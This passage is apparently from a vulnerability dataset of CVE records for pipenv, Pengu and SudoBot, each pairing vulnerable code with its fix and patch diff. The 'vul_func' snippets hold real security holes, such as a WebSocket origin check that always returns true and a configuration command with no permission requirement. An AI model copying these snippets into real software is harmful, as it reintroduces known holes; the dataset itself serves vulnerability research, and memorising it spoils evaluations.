{package.link}\"\n if package.editable\n else str(package.link)\n )\n project.add_package_to_pipfile(package_string, dev=dev)\n else:\n project.add_package_to_pipfile(str(package.req), dev=dev)\n for index in indexes:\n # don't require HTTPS for trusted hosts (see: https://pip.pypa.io/en/stable/cli/pip/#cmdoption-trusted-host)\n host_and_port = get_host_and_port(index)\n require_valid_https = not any((v in trusted_hosts for v in (\n host_and_port,\n host_and_port.partition(':')[0], # also check if hostname without port is in trusted_hosts\n )))\n project.add_index_to_pipfile(index, verify_ssl=require_valid_https)\n project.recase_pipfile()"}, {"id": "fix_py_411_2", "commit": "439782a8ae36c4762c88e43d5f0d8e563371b46f", "file_path": "pipenv/utils.py", "start_line": 1646, "end_line": 1667, "snippet": "def get_host_and_port(url):\n \"\"\"Get the host, or the host:port pair if port is explicitly included, for the given URL.\n\n Examples:\n >>> get_host_and_port('example.com')\n 'example.com'\n >>> get_host_and_port('example.com:443')\n 'example.com:443'\n >>> get_host_and_port('http://example.com')\n 'example.com'\n >>> get_host_and_port('https://example.com/')\n 'example.com'\n >>> get_host_and_port('https://example.com:8081')\n 'example.com:8081'\n >>> get_host_and_port('ssh://example.com')\n 'example.com'\n\n :param url: the URL string to parse\n :return: a string with the host:port pair if the URL includes port number explicitly; otherwise, returns host only\n \"\"\"\n url = urllib3_util.parse_url(url)\n return '{}:{}'.format(url.host, url.port) if url.port else url.host"}], "vul_patch": "--- a/pipenv/core.py\n+++ b/pipenv/core.py\n@@ -23,7 +23,7 @@\n if extra_index:\n indexes.append(extra_index)\n if trusted_host:\n- trusted_hosts.append(trusted_host)\n+ trusted_hosts.append(get_host_and_port(trusted_host))\n indexes = sorted(set(indexes))\n trusted_hosts = sorted(set(trusted_hosts))\n reqs = [install_req_from_parsed_requirement(f) for f in parse_requirements(r, session=pip_requests)]\n@@ -39,6 +39,11 @@\n else:\n project.add_package_to_pipfile(str(package.req), dev=dev)\n for index in indexes:\n- trusted = index in trusted_hosts\n- project.add_index_to_pipfile(index, verify_ssl=trusted)\n+ # don't require HTTPS for trusted hosts (see: https://pip.pypa.io/en/stable/cli/pip/#cmdoption-trusted-host)\n+ host_and_port = get_host_and_port(index)\n+ require_valid_https = not any((v in 
trusted_hosts for v in (\n+ host_and_port,\n+ host_and_port.partition(':')[0], # also check if hostname without port is in trusted_hosts\n+ )))\n+ project.add_index_to_pipfile(index, verify_ssl=require_valid_https)\n project.recase_pipfile()\n\n--- /dev/null\n+++ b/pipenv/core.py\n@@ -0,0 +1,22 @@\n+def get_host_and_port(url):\n+ \"\"\"Get the host, or the host:port pair if port is explicitly included, for the given URL.\n+\n+ Examples:\n+ >>> get_host_and_port('example.com')\n+ 'example.com'\n+ >>> get_host_and_port('example.com:443')\n+ 'example.com:443'\n+ >>> get_host_and_port('http://example.com')\n+ 'example.com'\n+ >>> get_host_and_port('https://example.com/')\n+ 'example.com'\n+ >>> get_host_and_port('https://example.com:8081')\n+ 'example.com:8081'\n+ >>> get_host_and_port('ssh://example.com')\n+ 'example.com'\n+\n+ :param url: the URL string to parse\n+ :return: a string with the host:port pair if the URL includes port number explicitly; otherwise, returns host only\n+ \"\"\"\n+ url = urllib3_util.parse_url(url)\n+ return '{}:{}'.format(url.host, url.port) if url.port else url.host\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-36623", "cve_description": "A vulnerability was found in Pengu. It has been declared as problematic. Affected by this vulnerability is the function runApp of the file src/index.js. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The name of the patch is aea66f12b8cdfc3c8c50ad6a9c89d8307e9d0a91. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216475.", "cwe_info": {"CWE-352": {"name": "Cross-Site Request Forgery (CSRF)", "description": "The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor. "}}, "repo": "https://github.com/jtojnar/pengu", "patch_url": ["https://github.com/jtojnar/pengu/commit/aea66f12b8cdfc3c8c50ad6a9c89d8307e9d0a91"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_301_1", "commit": "6ccc64f6f9135f938cf7123d2f7aaea78b39a622", "file_path": "src/index.js", "start_line": 71, "end_line": 73, "snippet": "\tfunction originIsAllowed() {\n\t\treturn true;\n\t}"}], "fix_func": [{"id": "fix_js_301_1", "commit": "aea66f12b8cdfc3c8c50ad6a9c89d8307e9d0a91", "file_path": "src/index.js", "start_line": 73, "end_line": 76, "snippet": "\tfunction originIsAllowed(origin) {\n\t\tconst url = new URL(origin);\n\t\treturn acceptedOrigins.includes(url.hostname);\n\t}"}, {"id": "fix_js_301_2", "commit": "aea66f12b8cdfc3c8c50ad6a9c89d8307e9d0a91", "file_path": "src/index.js", "start_line": 31, "end_line": 31, "snippet": "const acceptedOrigins = process.env.ACCEPTED_ORIGINS ? process.env.ACCEPTED_ORIGINS.split(',') : ['localhost', '127.0.0.1'];"}], "vul_patch": "--- a/src/index.js\n+++ b/src/index.js\n@@ -1,3 +1,4 @@\n-\tfunction originIsAllowed() {\n-\t\treturn true;\n+\tfunction originIsAllowed(origin) {\n+\t\tconst url = new URL(origin);\n+\t\treturn acceptedOrigins.includes(url.hostname);\n \t}\n\n--- /dev/null\n+++ b/src/index.js\n@@ -0,0 +1 @@\n+const acceptedOrigins = process.env.ACCEPTED_ORIGINS ? 
process.env.ACCEPTED_ORIGINS.split(',') : ['localhost', '127.0.0.1'];\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-45307", "cve_description": "SudoBot, a Discord moderation bot, is vulnerable to privilege escalation and exploit of the `-config` command in versions prior to 9.26.7. Anyone is theoretically able to update any configuration of the bot and potentially gain control over the bot's settings. Every version of v9 before v9.26.7 is affected. Other versions (e.g. v8) are not affected. Users should upgrade to version 9.26.7 to receive a patch. A workaround would be to create a command permission overwrite in the Database. A SQL statement provided in the GitHub Security Advisor can be executed to create a overwrite that disallows users without `ManageGuild` permission to run the `-config` command. Run the SQL statement for every server the bot is in, and replace `` with the appropriate Guild ID each time.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}}, "repo": "https://github.com/onesoft-sudo/sudobot", "patch_url": ["https://github.com/onesoft-sudo/sudobot/commit/ef46ca98562f3c1abef4ff7dd94d8f7b8155ee50"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_294_1", "commit": "10002f53fcd00a9273071ba37b52843017f6871f", "file_path": "src/main/typescript/commands/settings/ConfigCommand.ts", "start_line": 25, "end_line": 555, "snippet": "class ConfigCommand extends Command {\n public override readonly name = \"config\";\n public override readonly description: string = \"Manage configuration.\";\n public override readonly defer = true;\n public override readonly systemPermissions = [];\n public override readonly usage = [\" [...args: Any[]]\"];\n public override readonly subcommandMeta: Record = {\n get: {\n description: \"Get the value of a configuration key\",\n usage: [\"\"]\n },\n set: {\n description: \"Set the value of a configuration key\",\n usage: [\" \"]\n },\n save: {\n description: \"Save the current configuration.\"\n },\n restore: {\n description: \"Restore the previously saved configuration.\"\n },\n unset: {\n description: \"Unset a configuration key\"\n }\n };\n\n @Inject()\n private readonly configManager!: ConfigurationManager;\n @Inject()\n private readonly permissionManagerService!: PermissionManagerService;\n\n protected dottedConfig = {\n guild: getZodPropertyPaths(GuildConfigSchema),\n system: getZodPropertyPaths(SystemConfigSchema)\n };\n\n public override build(): Buildable[] {\n return [\n this.buildChatInput()\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"get\")\n .setDescription(\"Get the value of a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to view or change.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n .setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"unset\")\n .setDescription(\"Unset a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to unset.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n 
.setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"set\")\n .setDescription(\"Set the value of a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to view or change.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"value\")\n .setDescription(\"The new value to set the configuration key to.\")\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"cast\")\n .setDescription(\"The type to cast the value to.\")\n .setChoices(\n {\n name: \"String\",\n value: \"string\"\n },\n {\n name: \"Number\",\n value: \"number\"\n },\n {\n name: \"Boolean\",\n value: \"boolean\"\n },\n {\n name: \"JSON\",\n value: \"json\"\n }\n )\n )\n .addBooleanOption(option =>\n option\n .setName(\"save\")\n .setDescription(\"Save the current configuration immediately.\")\n )\n .addBooleanOption(option =>\n option\n .setName(\"no_create\")\n .setDescription(\"Do not create the key if it does not exist.\")\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n .setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand.setName(\"save\").setDescription(\"Save the current configuration.\")\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"restore\")\n .setDescription(\"Restore the previously saved configuration.\")\n )\n ];\n }\n\n public override async execute(\n context: LegacyContext | InteractionContext\n ): Promise {\n const subcommand = context.isLegacy()\n ? context.argv[1]\n : context.options.getSubcommand(true);\n\n if (!subcommand) {\n await context.error(\"You must provide a subcommand.\");\n return;\n }\n\n if (\n !context.isLegacy() &&\n (subcommand === \"get\" || subcommand === \"set\" || subcommand === \"unset\") &&\n context.options.getString(\"config_type\") === \"system\" &&\n !(await this.permissionManagerService.isSystemAdmin(context.member!))\n ) {\n await context.error(\n \"You do not have permission to view or change system configuration.\"\n );\n\n return;\n }\n\n switch (subcommand) {\n case \"get\":\n return this.get(context);\n case \"set\":\n return this.set(context);\n case \"unset\":\n return this.unset(context);\n case \"save\":\n return this.save(context);\n case \"restore\":\n return this.restore(context);\n default:\n await context.error(\n `The subcommand \\`${escapeInlineCode(\n subcommand\n )}\\` does not exist. Please use one of the following subcommands: \\`${this.subcommands.join(\n \"`, `\"\n )}\\`.`\n );\n return;\n }\n }\n\n @GatewayEventListener(\"interactionCreate\")\n public async onInteractionCreate(interaction: Interaction) {\n if (\n !interaction.isAutocomplete() ||\n interaction.commandName !== this.name ||\n !interaction.inGuild()\n ) {\n return;\n }\n\n const query = interaction.options.getFocused();\n const configType = (interaction.options.getString(\"config_type\") ?? \"guild\") as\n | \"guild\"\n | \"system\";\n\n if (\n configType === \"system\" &&\n !(await this.permissionManagerService.isSystemAdmin(interaction.member as GuildMember))\n ) {\n await interaction.respond([]);\n return;\n }\n\n const config =\n configType === \"guild\"\n ? (this.dottedConfig?.guild ?? 
[])\n : (this.dottedConfig?.system ?? []);\n const keys = [];\n\n for (const key of config) {\n if (keys.length >= 25) {\n break;\n }\n\n if (key.includes(query)) {\n keys.push({ name: key, value: key });\n }\n }\n\n await interaction.respond(keys);\n }\n\n private async get(context: LegacyContext | InteractionContext) {\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n\n if (!key) {\n await context.error(\"You must provide a configuration key to view.\");\n return;\n }\n\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n const configValue = get(config, key);\n const embed = new EmbedBuilder()\n .setTitle(\"Configuration Value\")\n .setDescription(\n `### ${inlineCode(key)}\\n\\n${codeBlock(\n \"json\",\n JSON5.stringify(configValue, {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n )}`\n )\n .setColor(Colors.Green)\n .setTimestamp();\n\n await context.replyEmbed(embed);\n }\n\n private async unset(context: LegacyContext | InteractionContext) {\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n\n if (!key) {\n await context.error(\"You must provide a configuration key to unset.\");\n return;\n }\n\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n try {\n unset(config, key);\n } catch (error) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` could not be unset: ${(error as Error)?.message}`\n );\n\n return;\n }\n\n const embed = new EmbedBuilder()\n .setTitle(\"Configuration Key Unset\")\n .setDescription(`### ${inlineCode(key)}\\n\\nSuccessfully unset this key.`)\n .setColor(Colors.Green)\n .setTimestamp();\n\n await context.replyEmbed(embed);\n }\n\n private async set(context: LegacyContext | InteractionContext) {\n if (context.isLegacy()) {\n if (!context.args[1]) {\n await context.error(\"You must provide a configuration key to set.\");\n return;\n }\n\n if (!context.args[2]) {\n await context.error(\"You must provide a value to set the configuration key to.\");\n return;\n }\n }\n\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n const value = context.isLegacy()\n ? context.commandContent\n .slice(context.argv[0].length)\n .trimStart()\n .slice(context.argv[1].length)\n .trimStart()\n .slice(context.argv[2].length)\n .trim()\n : context.options.getString(\"value\", true);\n const cast = (\n context.isLegacy() ? \"json\" : (context.options.getString(\"cast\") ?? \"string\")\n ) as CastType;\n const save = context.isLegacy() ? false : context.options.getBoolean(\"save\");\n const noCreate = context.isLegacy() ? 
false : context.options.getBoolean(\"no_create\");\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!key) {\n await context.error(\"You must provide a configuration key to set.\");\n return;\n }\n\n if (noCreate && !has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n let finalValue;\n\n switch (cast) {\n case \"string\":\n finalValue = value;\n break;\n case \"number\":\n finalValue = parseFloat(value);\n\n if (isNaN(finalValue)) {\n await context.error(\n `The value \\`${escapeInlineCode(value)}\\` is not a valid number.`\n );\n return;\n }\n\n break;\n case \"boolean\":\n {\n const lowerCased = value.toLowerCase();\n\n if (lowerCased !== \"true\" && lowerCased !== \"false\") {\n await context.error(\n `The value \\`${escapeInlineCode(value)}\\` is not a valid boolean.`\n );\n return;\n }\n\n finalValue = lowerCased === \"true\";\n }\n break;\n case \"json\":\n try {\n finalValue = JSON5.parse(value);\n } catch (e) {\n const error = codeBlock(\n e instanceof Object && \"message\" in e ? `${e.message}` : `${e}`\n );\n await context.reply({\n embeds: [\n {\n description: `### ${context.emoji(\n \"error\"\n )} Failed to parse the value as JSON\\n\\n${codeBlock(error.slice(0, 1800))}${\n error.length > 1800\n ? \"\\n... The error message is loo long.\"\n : \"\"\n }`,\n color: Colors.Red,\n footer: {\n text: \"No changes were made to the configuration\"\n },\n timestamp: new Date().toISOString()\n }\n ]\n });\n\n return;\n }\n\n break;\n }\n\n set(config, key, finalValue, {\n create: !noCreate\n });\n\n const embed = new EmbedBuilder();\n const error = this.configManager.testConfig();\n const errorString = error\n ? JSON5.stringify(error.error.format(), {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n : null;\n\n if (errorString && error) {\n await this.configManager.load();\n\n embed\n .setDescription(\n `### ${context.emoji(\"error\")} The configuration is invalid (${inlineCode(\n error.type\n )})\\n\\nThe changes were not saved.\\n\\n${codeBlock(errorString.slice(0, 1800))}${\n errorString.length > 1800 ? \"\\n... The error description is loo long.\" : \"\"\n }`\n )\n .setColor(Colors.Red)\n .setFooter({ text: \"The configuration was not saved.\" });\n\n await context.replyEmbed(embed);\n return;\n }\n\n embed\n .setTitle(\"Configuration Value Changed\")\n .setDescription(\n `### ${inlineCode(key)}\\n\\n${codeBlock(\n \"json\",\n JSON5.stringify(finalValue, {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n )}`\n )\n .setColor(Colors.Green)\n .setTimestamp()\n .setFooter({ text: `The configuration was ${save ? 
\"saved\" : \"applied\"}.` });\n\n if (save) {\n await this.configManager.write({\n guild: configType === \"guild\",\n system: configType === \"system\"\n });\n }\n\n await context.replyEmbed(embed);\n }\n\n private async save(context: LegacyContext | InteractionContext) {\n await this.configManager.write();\n await context.success(\"The configuration was saved.\");\n }\n\n private async restore(\n context: LegacyContext | InteractionContext\n ) {\n await this.configManager.load();\n await context.success(\"The configuration was restored.\");\n }\n}"}], "fix_func": [{"id": "fix_js_294_1", "commit": "ef46ca98562f3c1abef4ff7dd94d8f7b8155ee50", "file_path": "src/main/typescript/commands/settings/ConfigCommand.ts", "start_line": 26, "end_line": 557, "snippet": "class ConfigCommand extends Command {\n public override readonly name = \"config\";\n public override readonly description: string = \"Manage configuration.\";\n public override readonly defer = true;\n public override readonly systemPermissions = [];\n public override readonly usage = [\" [...args: Any[]]\"];\n public override readonly subcommandMeta: Record = {\n get: {\n description: \"Get the value of a configuration key\",\n usage: [\"\"]\n },\n set: {\n description: \"Set the value of a configuration key\",\n usage: [\" \"]\n },\n save: {\n description: \"Save the current configuration.\"\n },\n restore: {\n description: \"Restore the previously saved configuration.\"\n },\n unset: {\n description: \"Unset a configuration key\"\n }\n };\n public override readonly permissions = [PermissionFlags.ManageGuild];\n\n @Inject()\n private readonly configManager!: ConfigurationManager;\n @Inject()\n private readonly permissionManagerService!: PermissionManagerService;\n\n protected dottedConfig = {\n guild: getZodPropertyPaths(GuildConfigSchema),\n system: getZodPropertyPaths(SystemConfigSchema)\n };\n\n public override build(): Buildable[] {\n return [\n this.buildChatInput()\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"get\")\n .setDescription(\"Get the value of a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to view or change.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n .setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"unset\")\n .setDescription(\"Unset a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to unset.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n .setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"set\")\n .setDescription(\"Set the value of a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to view or change.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"value\")\n .setDescription(\"The new value to set the configuration key to.\")\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"cast\")\n .setDescription(\"The type to cast the 
value to.\")\n .setChoices(\n {\n name: \"String\",\n value: \"string\"\n },\n {\n name: \"Number\",\n value: \"number\"\n },\n {\n name: \"Boolean\",\n value: \"boolean\"\n },\n {\n name: \"JSON\",\n value: \"json\"\n }\n )\n )\n .addBooleanOption(option =>\n option\n .setName(\"save\")\n .setDescription(\"Save the current configuration immediately.\")\n )\n .addBooleanOption(option =>\n option\n .setName(\"no_create\")\n .setDescription(\"Do not create the key if it does not exist.\")\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n .setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand.setName(\"save\").setDescription(\"Save the current configuration.\")\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"restore\")\n .setDescription(\"Restore the previously saved configuration.\")\n )\n ];\n }\n\n public override async execute(\n context: LegacyContext | InteractionContext\n ): Promise {\n const subcommand = context.isLegacy()\n ? context.argv[1]\n : context.options.getSubcommand(true);\n\n if (!subcommand) {\n await context.error(\"You must provide a subcommand.\");\n return;\n }\n\n if (\n !context.isLegacy() &&\n (subcommand === \"get\" || subcommand === \"set\" || subcommand === \"unset\") &&\n context.options.getString(\"config_type\") === \"system\" &&\n !(await this.permissionManagerService.isSystemAdmin(context.member!))\n ) {\n await context.error(\n \"You do not have permission to view or change system configuration.\"\n );\n\n return;\n }\n\n switch (subcommand) {\n case \"get\":\n return this.get(context);\n case \"set\":\n return this.set(context);\n case \"unset\":\n return this.unset(context);\n case \"save\":\n return this.save(context);\n case \"restore\":\n return this.restore(context);\n default:\n await context.error(\n `The subcommand \\`${escapeInlineCode(\n subcommand\n )}\\` does not exist. Please use one of the following subcommands: \\`${this.subcommands.join(\n \"`, `\"\n )}\\`.`\n );\n return;\n }\n }\n\n @GatewayEventListener(\"interactionCreate\")\n public async onInteractionCreate(interaction: Interaction) {\n if (\n !interaction.isAutocomplete() ||\n interaction.commandName !== this.name ||\n !interaction.inGuild()\n ) {\n return;\n }\n\n const query = interaction.options.getFocused();\n const configType = (interaction.options.getString(\"config_type\") ?? \"guild\") as\n | \"guild\"\n | \"system\";\n\n if (\n configType === \"system\" &&\n !(await this.permissionManagerService.isSystemAdmin(interaction.member as GuildMember))\n ) {\n await interaction.respond([]);\n return;\n }\n\n const config =\n configType === \"guild\"\n ? (this.dottedConfig?.guild ?? [])\n : (this.dottedConfig?.system ?? []);\n const keys = [];\n\n for (const key of config) {\n if (keys.length >= 25) {\n break;\n }\n\n if (key.includes(query)) {\n keys.push({ name: key, value: key });\n }\n }\n\n await interaction.respond(keys);\n }\n\n private async get(context: LegacyContext | InteractionContext) {\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n\n if (!key) {\n await context.error(\"You must provide a configuration key to view.\");\n return;\n }\n\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? 
context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n const configValue = get(config, key);\n const embed = new EmbedBuilder()\n .setTitle(\"Configuration Value\")\n .setDescription(\n `### ${inlineCode(key)}\\n\\n${codeBlock(\n \"json\",\n JSON5.stringify(configValue, {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n )}`\n )\n .setColor(Colors.Green)\n .setTimestamp();\n\n await context.replyEmbed(embed);\n }\n\n private async unset(context: LegacyContext | InteractionContext) {\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n\n if (!key) {\n await context.error(\"You must provide a configuration key to unset.\");\n return;\n }\n\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n try {\n unset(config, key);\n } catch (error) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` could not be unset: ${(error as Error)?.message}`\n );\n\n return;\n }\n\n const embed = new EmbedBuilder()\n .setTitle(\"Configuration Key Unset\")\n .setDescription(`### ${inlineCode(key)}\\n\\nSuccessfully unset this key.`)\n .setColor(Colors.Green)\n .setTimestamp();\n\n await context.replyEmbed(embed);\n }\n\n private async set(context: LegacyContext | InteractionContext) {\n if (context.isLegacy()) {\n if (!context.args[1]) {\n await context.error(\"You must provide a configuration key to set.\");\n return;\n }\n\n if (!context.args[2]) {\n await context.error(\"You must provide a value to set the configuration key to.\");\n return;\n }\n }\n\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n const value = context.isLegacy()\n ? context.commandContent\n .slice(context.argv[0].length)\n .trimStart()\n .slice(context.argv[1].length)\n .trimStart()\n .slice(context.argv[2].length)\n .trim()\n : context.options.getString(\"value\", true);\n const cast = (\n context.isLegacy() ? \"json\" : (context.options.getString(\"cast\") ?? \"string\")\n ) as CastType;\n const save = context.isLegacy() ? false : context.options.getBoolean(\"save\");\n const noCreate = context.isLegacy() ? false : context.options.getBoolean(\"no_create\");\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? 
context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!key) {\n await context.error(\"You must provide a configuration key to set.\");\n return;\n }\n\n if (noCreate && !has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n let finalValue;\n\n switch (cast) {\n case \"string\":\n finalValue = value;\n break;\n case \"number\":\n finalValue = parseFloat(value);\n\n if (isNaN(finalValue)) {\n await context.error(\n `The value \\`${escapeInlineCode(value)}\\` is not a valid number.`\n );\n return;\n }\n\n break;\n case \"boolean\":\n {\n const lowerCased = value.toLowerCase();\n\n if (lowerCased !== \"true\" && lowerCased !== \"false\") {\n await context.error(\n `The value \\`${escapeInlineCode(value)}\\` is not a valid boolean.`\n );\n return;\n }\n\n finalValue = lowerCased === \"true\";\n }\n break;\n case \"json\":\n try {\n finalValue = JSON5.parse(value);\n } catch (e) {\n const error = codeBlock(\n e instanceof Object && \"message\" in e ? `${e.message}` : `${e}`\n );\n await context.reply({\n embeds: [\n {\n description: `### ${context.emoji(\n \"error\"\n )} Failed to parse the value as JSON\\n\\n${codeBlock(error.slice(0, 1800))}${\n error.length > 1800\n ? \"\\n... The error message is loo long.\"\n : \"\"\n }`,\n color: Colors.Red,\n footer: {\n text: \"No changes were made to the configuration\"\n },\n timestamp: new Date().toISOString()\n }\n ]\n });\n\n return;\n }\n\n break;\n }\n\n set(config, key, finalValue, {\n create: !noCreate\n });\n\n const embed = new EmbedBuilder();\n const error = this.configManager.testConfig();\n const errorString = error\n ? JSON5.stringify(error.error.format(), {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n : null;\n\n if (errorString && error) {\n await this.configManager.load();\n\n embed\n .setDescription(\n `### ${context.emoji(\"error\")} The configuration is invalid (${inlineCode(\n error.type\n )})\\n\\nThe changes were not saved.\\n\\n${codeBlock(errorString.slice(0, 1800))}${\n errorString.length > 1800 ? \"\\n... The error description is loo long.\" : \"\"\n }`\n )\n .setColor(Colors.Red)\n .setFooter({ text: \"The configuration was not saved.\" });\n\n await context.replyEmbed(embed);\n return;\n }\n\n embed\n .setTitle(\"Configuration Value Changed\")\n .setDescription(\n `### ${inlineCode(key)}\\n\\n${codeBlock(\n \"json\",\n JSON5.stringify(finalValue, {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n )}`\n )\n .setColor(Colors.Green)\n .setTimestamp()\n .setFooter({ text: `The configuration was ${save ? 
\"saved\" : \"applied\"}.` });\n\n if (save) {\n await this.configManager.write({\n guild: configType === \"guild\",\n system: configType === \"system\"\n });\n }\n\n await context.replyEmbed(embed);\n }\n\n private async save(context: LegacyContext | InteractionContext) {\n await this.configManager.write();\n await context.success(\"The configuration was saved.\");\n }\n\n private async restore(\n context: LegacyContext | InteractionContext\n ) {\n await this.configManager.load();\n await context.success(\"The configuration was restored.\");\n }\n}"}], "vul_patch": "--- a/src/main/typescript/commands/settings/ConfigCommand.ts\n+++ b/src/main/typescript/commands/settings/ConfigCommand.ts\n@@ -23,6 +23,7 @@\n description: \"Unset a configuration key\"\n }\n };\n+ public override readonly permissions = [PermissionFlags.ManageGuild];\n \n @Inject()\n private readonly configManager!: ConfigurationManager;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-41962", "cve_description": "Bostr is an nostr relay aggregator proxy that acts like a regular nostr relay. bostr let everyone in even having authorized_keys being set when noscraper is set to true. This vulnerability is fixed in 3.0.10.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/Yonle/bostr", "patch_url": 